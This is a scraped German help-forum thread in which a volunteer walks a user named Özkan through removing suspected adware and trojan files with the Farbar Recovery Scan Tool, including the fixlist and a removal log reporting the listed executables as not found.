C:\Users\�zkan\AppData\Roaming\rmMkisrweHV4RuaBdLxOYzzbuC5.exe
 C:\Users\?zkan\AppData\Roaming\KYG1QOVT.exe
C:\Users\?zkan\AppData\Roaming\lm6V3l7.exe

Speichere diese bitte als Fixlist.txt auf deinem Desktop (oder dem Verzeichnis in dem sich FRST befindet).

Starte nun FRST erneut und klicke den Entfernen Button.
Das Tool erstellt eine Fixlog.txt.
Poste mir deren Inhalt.

EmreTprk · 29.12.2015, 02:47

Entferungsergebnis von Farbar Recovery Scan Tool (x64) Version:20-12-2015
durchgeführt von Özkan (2015-12-29 02:46:46) Run:2
Gestartet von C:\Users\Özkan\Desktop
Geladene Profile: Özkan (Verfügbare Profile: Özkan & Gast)
Start-Modus: Normal
==============================================

fixlist Inhalt:
*****************
C:\Users\?zkan\AppData\Roaming\QiQMvbuugirF3MbSxPFk0Y.exe
C:\Users\?zkan\AppData\Roaming\rmMkisrweHV4RuaBdLxOYzzbuC5.exe
C:\Users\?zkan\AppData\Roaming\KYG1QOVT.exe
C:\Users\?zkan\AppData\Roaming\lm6V3l7.exe

*****************

"C:\Users\?zkan\AppData\Roaming\QiQMvbuugirF3MbSxPFk0Y.exe" => nicht gefunden.
"C:\Users\?zkan\AppData\Roaming\rmMkisrweHV4RuaBdLxOYzzbuC5.exe" => nicht gefunden.
"C:\Users\?zkan\AppData\Roaming\KYG1QOVT.exe" => nicht gefunden.
"C:\Users\?zkan\AppData\Roaming\lm6V3l7.exe" => nicht gefunden.

==== Ende von Fixlog 02:46:46 ====

21.12.2015, 23:05	#6
Bootsektor Ruhe in Frieden † 2019	Adware, Trojaner etc. Malware wahrscheinlich Joah. __________________ --> Adware, Trojaner etc. Malware wahrscheinlich

22.12.2015, 20:45	#10
Bootsektor Ruhe in Frieden † 2019	Adware, Trojaner etc. Malware wahrscheinlich Hallo, gerne. Ja das gehört da auch nicht hin. Kannst du mir bitte noch das Log von Malwarebytes posten, das ist nur das Protektionslog. __________________ Grüße stolzes Mitglied von UNITE Du hast Lob oder Verbesserungsvorschläge? Du findest unsere Arbeit gut und möchtest uns finanziell unterstützen? -> Spende

Adware, Trojaner etc. Malware wahrscheinlich

Plagegeister aller Art und deren Bekämpfung: Adware, Trojaner etc. Malware wahrscheinlich